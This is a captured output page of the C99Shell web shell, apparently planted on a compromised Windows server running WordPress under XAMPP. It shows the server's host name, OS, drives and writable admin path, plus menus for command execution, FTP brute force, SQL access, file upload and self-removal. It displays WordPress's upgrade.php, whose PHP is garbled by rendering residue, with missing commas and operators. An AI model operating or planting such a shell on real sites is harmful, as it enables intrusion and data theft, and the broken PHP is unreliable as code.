!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\wordpress\wp-admin\   drwxrwxrwx
Free 7.26 GB of 239.26 GB (3.04%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     upgrade.php (2.39 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
define
('WP_INSTALLING'true);
if (!
file_exists('../wp-config.php')) die("There doesn't seem to be a wp-config.php file. Double check that you updated wp-config-sample.php with the proper database connection information and renamed it to wp-config.php.");
require(
'../wp-config.php');
timer_start();
require_once(
ABSPATH '/wp-admin/upgrade-functions.php');

$step $_GET['step'];
if (!
$step$step 0;
header'Content-Type: text/html; charset=utf-8' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>WordPress &rsaquo; Upgrade</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <style media="screen" type="text/css">
    <!--
    html {
        background: #eee;
    }
    body {
        background: #fff;
        color: #000;
        font-family: Georgia, "Times New Roman", Times, serif;
        margin-left: 20%;
        margin-right: 20%;
        padding: .2em 2em;
    }
    
    h1 {
        color: #006;
        font-size: 18px;
        font-weight: lighter;
    }
    
    h2 {
        font-size: 16px;
    }
    
    p, li, dt {
        line-height: 140%;
        padding-bottom: 2px;
    }

    ul, ol {
        padding: 5px 5px 5px 20px;
    }
    #logo {
        margin-bottom: 2em;
    }
.step a, .step input {
    font-size: 2em;
}
.step, th {
    text-align: right;
}
#footer {
text-align: center; border-top: 1px solid #ccc; padding-top: 1em; font-style: italic;
}
    -->
    </style>
</head>
<body>
<h1 id="logo"><img alt="WordPress" src="images/wordpress-logo.png" /></h1>
<?php
switch($step) {

    case 
0:
    
$goback wp_specialchars($_SERVER['HTTP_REFERER'], 1);
?> 
<p><?php _e('This file upgrades you from any previous version of WordPress to the latest. It may take a while though, so be patient.'); ?></p> 
    <h2 class="step"><a href="upgrade.php?step=1&amp;backto=<?php echo $goback?>"><?php _e('Upgrade WordPress &raquo;'); ?></a></h2>
<?php
    
break;
    
    case 
1:
    
wp_cache_flush();
    
make_db_current_silent();
    
upgrade_all();
    
wp_cache_flush();

    if ( empty( 
$_GET['backto'] ) )
        
$backto __get_option('home');
    else
        
$backto wp_specialchars$_GET['backto'] , );
?> 
<h2><?php _e('Step 1'); ?></h2> 
    <p><?php printf(__("There's actually only one step. So if you see this, you're done. <a href='%s'>Have fun</a>!"),  $backto); ?></p>

<!--
<pre>
<?php printf(__('%s queries'), $wpdb->num_queries); ?>

<?php printf(__('%s seconds'), timer_stop(0)); ?>
</pre>
-->

<?php
    
break;
}
?> 
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--